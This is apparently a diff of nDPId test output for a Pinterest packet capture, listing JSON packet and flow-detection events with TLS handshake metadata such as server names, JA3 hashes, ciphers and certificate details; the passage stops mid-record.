00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1605289714181,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714181,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoETkIAHQAAAAAAAAAAAIQqAcsBIEmLB5kd7IUo3\/YpAbuWdKO8RXbDRQaFoBJXgAyCAAACBAV4AQMDAwQCCArCuSH61mIgAw=="} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1605289714181,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714181,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoETkIAHQAAAAAAAAAAAIQqAcsBIEmLB5kd7IUo3\/YpAbuWchkTOMV4SazBoBJXgEidAAACBAV4AQMDAwQCCArCuSH71mIgAw=="} 
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1605289714181,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714181,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoETkIAHQAAAAAAAAAAAIQqAcsBIEmLB5kd7IUo3\/YpAbuWelCqgAoyXzbFoBJXgIWfAAACBAV4AQMDAwQCCArCuSH71mIgAw=="} 
@@ -39,22 +39,22 @@ 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1605289714181,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714181,"pkt":"qtsDr8lk5EKm5WPyht1gAzjWACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElnIBu3hJrMEZEzjGgBAB+8yHAAABAQgK1mIgKsK5Ifs="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1605289714181,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714181,"pkt":"qtsDr8lk5EKm5WPyht1gAoQZACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElnoBuzJfNsVQqoALgBAB+wmKAAABAQgK1mIgKsK5Ifs="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1605289714181,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714181,"pkt":"qtsDr8lk5EKm5WPyht1gAI0zACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElngBu4oDE2bprOc6gBAB+9UUAAABAQgK1mIgKsK5Ifs="} 
-00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":99,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714181,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714181,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38516,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714182,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38514,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714182,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38522,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":102,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714182,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":104,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289714142,"flow_last_seen":1605289714204,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605289714204,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38512,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02783{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":107,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605289714142,"flow_last_seen":1605289714204,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":648,"midstream":0,"thread_ts_msec":1605289714204,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38512,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., 
CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} -01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":127,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38518,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":131,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":583,"midstream":0,"thread_ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38518,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., 
CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} -01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":134,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38516,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":135,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38522,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":138,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":583,"midstream":0,"thread_ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38522,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., 
CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} -01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":141,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38514,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":149,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1605289714142,"flow_last_seen":1605289714230,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":449,"midstream":0,"thread_ts_msec":1605289714230,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38516,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., 
CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} -02784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":150,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1605289714142,"flow_last_seen":1605289714230,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":530,"midstream":0,"thread_ts_msec":1605289714230,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38514,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.c
